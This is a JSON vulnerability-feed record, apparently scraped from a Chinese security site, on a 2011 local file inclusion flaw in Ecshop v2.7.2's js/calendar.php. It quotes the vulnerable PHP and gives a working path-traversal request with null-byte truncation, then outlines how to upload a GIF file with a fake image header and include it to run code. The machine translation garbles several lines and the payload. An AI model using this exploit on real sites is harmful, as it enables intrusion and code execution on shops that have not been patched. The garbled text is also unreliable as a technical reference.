{"type": "myhack58", "edition": 1, "title": "Ecshop the latest version v. 2 7 2 Local include vulnerability Oday-vulnerability warning-the black bar safety net", "references": [], "bulletinFamily": "info", "published": "2011-08-01T00:00:00", "lastseen": "2016-11-08T21:08:15", "modified": "2011-08-01T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2011/31409.htm", "viewCount": 0, "reporter": "\u4f5a\u540d", "cvss": {"vector": "NONE", "score": 0.0}, "enchantments": {"score": {"value": 1.0, "vector": "NONE", "modified": "2016-11-08T21:08:15", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-08T21:08:15", "rev": 2}, "vulnersScore": 1.0}, "cvelist": [], "id": "MYHACK58:62201131409", "description": "\u201cjs/calendar.php\u201d: the \n$lang = (! empty($_GET['lang'])) \n? trim($_GET['lang']) : 'EN';//no filter, obviously contains a vulnerability \nif (! file_exists('../languages/' . $lang . '/calendar.php')) \n{ \n$lang = 'EN'; \n} \nrequire(dirname(dirname(__FILE__)) . '/data/config.php'); \nheader('Content-type: application/x-javascript; charset=' . EC_CHARSET); \nthe include_once('../languages/' . $lang . '/calendar.php');//included here, and need to be truncated \nTest code: \n//Need magic_quotes_gpc = Off\n\n\n/js/calendar. php? lang=../index. php%0 0. \nNote the back has a\u201c.\u201d\uff09 \nUse: 1, registered user\n\n\n2, and then upload the GIF89a header of the GIF file cheat,\n\n\n3, and then included, such as:%0 0. Note the back has a\u201c.\u201d\uff09\n", "immutableFields": []}

{}